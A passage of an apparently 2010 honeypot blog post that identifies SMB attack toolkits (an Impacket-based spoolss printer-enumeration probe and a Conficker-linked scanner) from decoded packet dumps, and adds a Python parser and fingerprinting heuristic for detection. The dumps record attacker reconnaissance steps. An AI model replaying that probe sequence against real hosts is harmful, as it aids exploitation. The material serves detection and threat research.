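IMPACKET_NEGOTIATE = build_negotiate(0, 0, 10948, 0, ["NT LM 0.12"])

if __name__ == "__main__":
    for sample in (ALLAPLE_NEGOTIATE, IMPACKET_NEGOTIATE):
        print(fingerprint(parse_negotiate(sample)))
```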

SessionSetup offered nt and pysmb as NativeOS and NativeLanManager; this was likely Impacket, as Impacket builds upon pysmb.

###[ SMB Sessionsetup AndX Request2 sizeof(40) ]### 
        WordCount           = 13              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        MaxBufferSize       = 65535           sizeof(  2) off=  5 goff= 41
        MaxMPXCount         = 2               sizeof(  2) off=  7 goff= 43
        VCNumber            = 10948           sizeof(  2) off=  9 goff= 45
        SessionKey          = 0               sizeof(  4) off= 11 goff= 47
        PasswordLength      = 0               sizeof(  2) off= 15 goff= 51
        UnicodePasswordLength= 0               sizeof(  2) off= 17 goff= 53
        Reserved2           = 0               sizeof(  4) off= 19 goff= 55
        Capabilties         = RAW_MODE        sizeof(  4) off= 23 goff= 59
        ByteCount           = 11              sizeof(  2) off= 27 goff= 63
        Password            = b''             sizeof(  0) off= 29 goff= 65
        UnicodePassword     = b''             sizeof(  0) off= 29 goff= 65
        Account             = b'\x00'         sizeof(  1) off= 29 goff= 65
        PrimaryDomain       = b'\x00'         sizeof(  1) off= 30 goff= 66
        NativeOS            = b'nt\x00'       sizeof(  3) off= 31 goff= 67
        NativeLanManager    = b'pysmb\x00'    sizeof(  6) off= 34 goff= 70
        Extrabytes          = b''             sizeof(  0) off= 40 goff= 76

Treeconnect on \\*SMBSERVER\IPC$, the Impacket default:

###[ SMB Treeconnect AndX Request sizeof(36) ]### 
        WordCount           = 4               sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        Reserved1           = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        Flags               = 0x0             sizeof(  2) off=  5 goff= 41
        PasswordLength      = 1               sizeof(  2) off=  7 goff= 43
        ByteCount           = 25              sizeof(  2) off=  9 goff= 45
        Password            = b'\x00'         sizeof(  1) off= 11 goff= 47
        Path                = b'\\\\*SMBSERVER\\IPC$\x00' sizeof( 18) off= 12 goff= 48
        Service             = b'?????\x00'    sizeof(  6) off= 30 goff= 66
        Extrabytes          = b''             sizeof(  0) off= 36 goff= 72

NTcreate spoolss - I was already hoping for this to be an MS10-061 …

###[ SMB NTcreate AndX Request sizeof(59) ]### 
        WordCount           = 24              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        Reserved1           = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        Reserved2           = 0               sizeof(  1) off=  5 goff= 41
        FilenameLen         = 7               sizeof(  2) off=  6 goff= 42
        CreateFlags         = 0x00000002+EXCL_OPLOCK+CREATE_DIRECTORY sizeof(  4) off=  8 goff= 44
        RootFID             = 0x0             sizeof(  4) off= 12 goff= 48
        AccessMask          = READ+WRITE+APPEND+READ_EA+WRITE_EA+READ_ATTR+WRITE_ATTR+READ_CTRL sizeof(  4) off= 16 goff= 52
        AllocationSize      = 0               sizeof(  8) off= 20 goff= 56
        FileAttributes      = 0x00000000      sizeof(  4) off= 28 goff= 64
        ShareAccess         = READ+WRITE      sizeof(  4) off= 32 goff= 68
        Disposition         = 1               sizeof(  4) off= 36 goff= 72
        CreateOptions       = NONDIRECTORY    sizeof(  4) off= 40 goff= 76
        Impersonation       = 2               sizeof(  4) off= 44 goff= 80
        SecurityFlags       = CTX_TRACKING+EFFECTIVE_ONLY sizeof(  1) off= 48 goff= 84
        ByteCount           = 8               sizeof(  2) off= 49 goff= 85
        Filename            = b'spoolss\x00'  sizeof(  8) off= 51 goff= 87
        Extrabytes          = b''             sizeof(  0) off= 59 goff= 95

Trans to bind spoolss:

###[ SMB Trans Request sizeof(42) ]### 
        WordCount           = 16              sizeof(  1) off=  0 goff= 36
        TotalParamCount     = 0               sizeof(  2) off=  1 goff= 37
        TotalDataCount      = 72              sizeof(  2) off=  3 goff= 39
        MaxParamCount       = 1024            sizeof(  2) off=  5 goff= 41
        MaxDataCount        = 65504           sizeof(  2) off=  7 goff= 43
        MaxSetupCount       = 0               sizeof(  1) off=  9 goff= 45
        Reserved1           = 0               sizeof(  1) off= 10 goff= 46
        Flags               = 0x0             sizeof(  2) off= 11 goff= 47
        Timeout             = 0               sizeof(  4) off= 13 goff= 49
        Reserved2           = 0               sizeof(  2) off= 17 goff= 53
        ParamCount          = 0               sizeof(  2) off= 19 goff= 55
        ParamOffset         = 74              sizeof(  2) off= 21 goff= 57
        DataCount           = 72              sizeof(  2) off= 23 goff= 59
        DataOffset          = 74              sizeof(  2) off= 25 goff= 61
        SetupCount          = 2               sizeof(  1) off= 27 goff= 63
        Reserved3           = 0               sizeof(  1) off= 28 goff= 64
        Setup               = [9728,1920]     sizeof(  4) off= 29 goff= 65
        ByteCount           = 79              sizeof(  2) off= 33 goff= 69
        TransactionName     = b'\\PIPE\\\x00' sizeof(  7) off= 35 goff= 71
        Pad                 = b''             sizeof(  0) off= 42 goff= 78
        Param               = []              sizeof(  0) off= 42 goff= 78
        Pad1                = b''             sizeof(  0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]### 
           Version             = 5               sizeof(  1) off=  0 goff= 78
           VersionMinor        = 0               sizeof(  1) off=  1 goff= 79
           PacketType          = Bind            sizeof(  1) off=  2 goff= 80
           PacketFlags         = 0x3             sizeof(  1) off=  3 goff= 81
           DataRepresentation  = 16              sizeof(  4) off=  4 goff= 82
           FragLen             = 72              sizeof(  2) off=  8 goff= 86
           AuthLen             = 0               sizeof(  2) off= 10 goff= 88
           CallID              = 1               sizeof(  4) off= 12 goff= 90
###[ DCERPC Bind sizeof(56) ]### 
              MaxTransmitFrag     = 4280            sizeof(  2) off=  0 goff= 94
              MaxReceiveFrag      = 4280            sizeof(  2) off=  2 goff= 96
              AssocGroup          = 0x0             sizeof(  4) off=  4 goff= 98
              NumCtxItems         = 1               sizeof(  1) off=  8 goff=102
              FixGap              = b'\x00\x00\x00' sizeof(  3) off=  9 goff=103
              \CtxItems  \
               |###[ DCERPC CtxItem sizeof(44) ]### 
               |  ContextID           = 0               sizeof(  2) off=  0 goff=106
               |  NumTransItems       = 1               sizeof(  1) off=  2 goff=108
               |  FixGap              = 0               sizeof(  1) off=  3 goff=109
               |  UUID                = 12345678-1234-abcd-ef00-0123456789ab sizeof( 16) off=  4 goff=110
               |  InterfaceVer        = 1               sizeof(  2) off= 20 goff=126
               |  InterfaceVerMinor   = 0               sizeof(  2) off= 22 goff=128
               |  TransferSyntax      = 8a885d04-1ceb-11c9-9fe8-08002b104860 sizeof( 16) off= 24 goff=130
               |  TransferSyntaxVersion= 2               sizeof(  4) off= 40 goff=146

Trans to call EnumPrinters:

###[ SMB Trans Request sizeof(42) ]### 
        WordCount           = 16              sizeof(  1) off=  0 goff= 36
        TotalParamCount     = 0               sizeof(  2) off=  1 goff= 37
        TotalDataCount      = 48              sizeof(  2) off=  3 goff= 39
        MaxParamCount       = 1024            sizeof(  2) off=  5 goff= 41
        MaxDataCount        = 65504           sizeof(  2) off=  7 goff= 43
        MaxSetupCount       = 0               sizeof(  1) off=  9 goff= 45
        Reserved1           = 0               sizeof(  1) off= 10 goff= 46
        Flags               = 0x0             sizeof(  2) off= 11 goff= 47
        Timeout             = 0               sizeof(  4) off= 13 goff= 49
        Reserved2           = 0               sizeof(  2) off= 17 goff= 53
        ParamCount          = 0               sizeof(  2) off= 19 goff= 55
        ParamOffset         = 74              sizeof(  2) off= 21 goff= 57
        DataCount           = 48              sizeof(  2) off= 23 goff= 59
        DataOffset          = 74              sizeof(  2) off= 25 goff= 61
        SetupCount          = 2               sizeof(  1) off= 27 goff= 63
        Reserved3           = 0               sizeof(  1) off= 28 goff= 64
        Setup               = [9728,1920]     sizeof(  4) off= 29 goff= 65
        ByteCount           = 55              sizeof(  2) off= 33 goff= 69
        TransactionName     = b'\\PIPE\\\x00' sizeof(  7) off= 35 goff= 71
        Pad                 = b''             sizeof(  0) off= 42 goff= 78
        Param               = []              sizeof(  0) off= 42 goff= 78
        Pad1                = b''             sizeof(  0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]### 
           Version             = 5               sizeof(  1) off=  0 goff= 78
           VersionMinor        = 0               sizeof(  1) off=  1 goff= 79
           PacketType          = Request         sizeof(  1) off=  2 goff= 80
           PacketFlags         = 0x3             sizeof(  1) off=  3 goff= 81
           DataRepresentation  = 16              sizeof(  4) off=  4 goff= 82
           FragLen             = 48              sizeof(  2) off=  8 goff= 86
           AuthLen             = 0               sizeof(  2) off= 10 goff= 88
           CallID              = 1               sizeof(  4) off= 12 goff= 90
###[ DCERPC Request sizeof(32) ]### 
              AllocHint           = 24              sizeof(  4) off=  0 goff= 94
              ContextID           = 0               sizeof(  2) off=  4 goff= 98
              OpNum               = 0               sizeof(  2) off=  6 goff=100
              StubData            = b'\x08\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00!>%Z\x00\x00\x00\x00\x00\x00\x00\x00' sizeof( 24) off=  8 goff=102

Afterwards the client sent a Tree Disconnect and a Logoff and disconnected. As we were able to identify the attacking host, and had a real interest in the malware running the attack, we got a copy of the malware; the analysis, which Tillmann promised to post to securelist, is, contrary to looking at SMB packets, really exciting.
The session outlined here was only used to fingerprint the host for exploitation offsets, using EnumPrinters, just as metasploit does, and to my great pleasure … nah, I won't spoil Tillmann's story.

MS CLIENT

This attack came to our attention as it made a *large* amount of total traffic for some deployments, and we were provided with the required information (a pcap in this case, so the data below is tshark -V output, which is even less compact than dionaea's representation) to have a look at it.

Again the attacker had Flags and Flags2 set to 0

NetBIOS Session Service
    Message Type: Session message
    Length: 47
SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        SMB Command: Negotiate Protocol (0x72)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x00
        Flags2: 0x0000
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 0
        Process ID: 604
        User ID: 0
        Multiplex ID: 0

and offered only NT LM 0.12 as dialect
    Negotiate Protocol Request (0x72)
        Word Count (WCT): 0
        Byte Count (BCC): 12
        Requested Dialects
            Dialect: NT LM 0.12
                Buffer Format: Dialect (2)
                Name: NT LM 0.12

which indicates this is not the Windows SMB stack.

After sending a Session Setup AndX request

    Session Setup AndX Request (0x73)
        Word Count (WCT): 13
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        Max Buffer: 65535
        Max Mpx Count: 2
        VC Number: 604
        Session Key: 0x00000000
        ANSI Password Length: 0
        Unicode Password Length: 0
        Reserved: 00000000
        Capabilities: 0x00000001
            .... .... .... .... .... .... .... ...1 = Raw Mode: Read Raw and Write Raw are supported
        Byte Count (BCC): 11
        Account: 
        Primary Domain: 
        Native OS: MS
        Native LAN Manager: CLIENT

with Native OS MS and Native LAN Manager CLIENT, the attacker would disconnect.

Often a variant of Conficker was downloaded after this request, so we basically assume this is a hardcoded scan, probably created from impacket dumps, used by Conficker.
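The fingerprint described in this section, as an added example that is not part of the original post or of dionaea: a small parser for the two requests shown above (Negotiate Protocol and the 13-word Session Setup AndX) and the heuristic applied to them. The packets it runs on are constructed to match the tshark output (Flags and Flags2 0, a single NT LM 0.12 dialect, Native OS MS / Native LAN Manager CLIENT, PID 604), not captured bytes; the function names, dictionary keys and hint strings are this example's own.

```python
# Added example, not dionaea's code: a minimal SMB1 request parser for the
# fields this post fingerprints on (Flags2 and the dialect list from Negotiate
# Protocol, Native OS / Native LAN Manager from Session Setup AndX) plus the
# heuristic itself. The two sample packets are constructed to mirror the
# tshark dumps above; they are not captured bytes.
import struct

SMB_NEGOTIATE, SMB_SESSION_SETUP_ANDX = 0x72, 0x73
FLAGS2_UNICODE = 0x8000   # the Windows SMB stack sets this; the scanner does not


def parse_smb(pkt):
    """One NetBIOS-framed SMB1 request -> dict. ValueError when the framing or
    the word/byte counts do not add up (what dionaea surfaced as EOFError)."""
    if len(pkt) < 36 or pkt[0] != 0 or int.from_bytes(pkt[1:4], "big") != len(pkt) - 4:
        raise ValueError("bad NetBIOS session header")
    smb = pkt[4:]
    if smb[:4] != b"\xffSMB":
        raise ValueError("missing SMB magic")
    # magic(4) cmd(1) status(4) flags(1) flags2(2) pidhigh(2) sig(8) rsvd(2)
    # tid(2) pid(2) uid(2) mid(2) = 32 bytes, then WCT, words, BCC, bytes
    cmd, _status, flags, flags2, _pidhigh = struct.unpack_from("<BIBHH", smb, 4)
    wct = smb[32]
    if len(smb) < 35 + 2 * wct:
        raise ValueError("word block truncated")
    words = smb[33:33 + 2 * wct]
    bcc = struct.unpack_from("<H", smb, 33 + 2 * wct)[0]
    data = smb[35 + 2 * wct:35 + 2 * wct + bcc]
    if len(data) != bcc:
        raise ValueError("byte block truncated")
    info = {"command": cmd, "flags": flags, "flags2": flags2,
            "pid": struct.unpack_from("<H", smb, 26)[0]}
    if cmd == SMB_NEGOTIATE:
        info["dialects"] = parse_dialects(data)
    elif cmd == SMB_SESSION_SETUP_ANDX:
        info.update(parse_session_setup(words, data, flags2))
    return info


def parse_dialects(data):
    """Negotiate byte block: repeated 0x02 + NUL-terminated dialect name."""
    dialects, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:
            raise ValueError("bad dialect buffer format")
        end = data.index(b"\x00", pos + 1)
        dialects.append(data[pos + 1:end].decode("ascii"))
        pos = end + 1
    return dialects


def parse_session_setup(words, data, flags2):
    """13-word Session Setup AndX with ASCII strings (Flags2 UNICODE clear)."""
    if len(words) != 26 or flags2 & FLAGS2_UNICODE:
        raise ValueError("only the WCT 13, non-unicode form is handled here")
    (_andx, _rsvd, _off, max_buf, max_mpx, vc, _key, oem_len, uni_len,
     _res, caps) = struct.unpack("<BBHHHHIHHII", words)
    # account, domain, native OS, native LAN manager follow the passwords; a
    # missing final NUL is tolerated, which is how "\0\0MS\0CLIENT" fits BCC 11
    f = [s.decode("ascii", "replace") for s in data[oem_len + uni_len:].split(b"\x00")[:4]]
    f += [""] * (4 - len(f))
    return {"max_buffer": max_buf, "max_mpx": max_mpx, "vc": vc, "capabilities": caps,
            "account": f[0], "domain": f[1], "native_os": f[2], "native_lm": f[3]}


def fingerprint(requests):
    """The heuristics from this post, applied to a parsed session."""
    hints = []
    for r in requests:
        if r["command"] == SMB_NEGOTIATE:
            if not r["flags2"] & FLAGS2_UNICODE:
                hints.append("Flags2 without UNICODE: not the Windows SMB stack")
            if r["dialects"] == ["NT LM 0.12"]:
                hints.append("only NT LM 0.12 offered")
        elif (r["command"] == SMB_SESSION_SETUP_ANDX
              and (r["native_os"], r["native_lm"]) == ("MS", "CLIENT")):
            hints.append("Native OS/LAN Manager MS/CLIENT: hardcoded scanner")
    return hints


def smb_packet(cmd, words, data, pid=604):
    """Constructed NetBIOS-framed SMB1 request with Flags and Flags2 both 0."""
    hdr = (b"\xffSMB" + struct.pack("<BIBHH", cmd, 0, 0, 0, 0) + b"\x00" * 8
           + struct.pack("<HHHHH", 0, 0, pid, 0, 0))
    smb = hdr + bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


# Constructed samples mirroring the two dumps above (not captured bytes).
NEGOTIATE = smb_packet(SMB_NEGOTIATE, b"", b"\x02NT LM 0.12\x00")
SESSION_SETUP = smb_packet(
    SMB_SESSION_SETUP_ANDX,
    struct.pack("<BBHHHHIHHII", 0xff, 0, 0, 65535, 2, 604, 0, 0, 0, 0, 1),
    b"\x00\x00MS\x00CLIENT")
```

The constructed Negotiate comes out at a NetBIOS length of 47, the same as the tshark dump, and `fingerprint([parse_smb(NEGOTIATE), parse_smb(SESSION_SETUP)])` returns all three hints. A short or inconsistent packet raises ValueError instead of reading past the buffer, which is the condition the first session surfaced as EOFError in dionaea. All three hints together are a reasonably narrow signature for this scanner; a cleared UNICODE bit in Flags2 on its own only says the client is not the Windows stack.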

Comments

1

[…] 2010:11:12:identifying_toolkits [carnivore news] […]

2010/11/12 11:45
2

Hello Markus,

I am thinking of investigating and building a worm detection system based upon the honeypot mwcollectd v4 or dionaea.

My key question is:

-What are the dionaea advantages and differences compared with mwcollectd v4 (what is the best)?

I am in doubt about which honeypot to use in my system.

Thank you for your attention; I would greatly appreciate it if you were totally unbiased in answering the question about dionaea and mwcollectd v4.

Best Regards.

xSpeedY
2010/11/17 17:34
3

I would not roll my own, if I think somebody would do better already, so …

What I like about dionaea: logsql, xmpp, virustotal and others. Install both, let me know what you like best.

Markus

Markus
2010/11/18 17:54


2010/11/12/identifying_toolkits.txt · Last modified: 2010/11/12 11:00 by common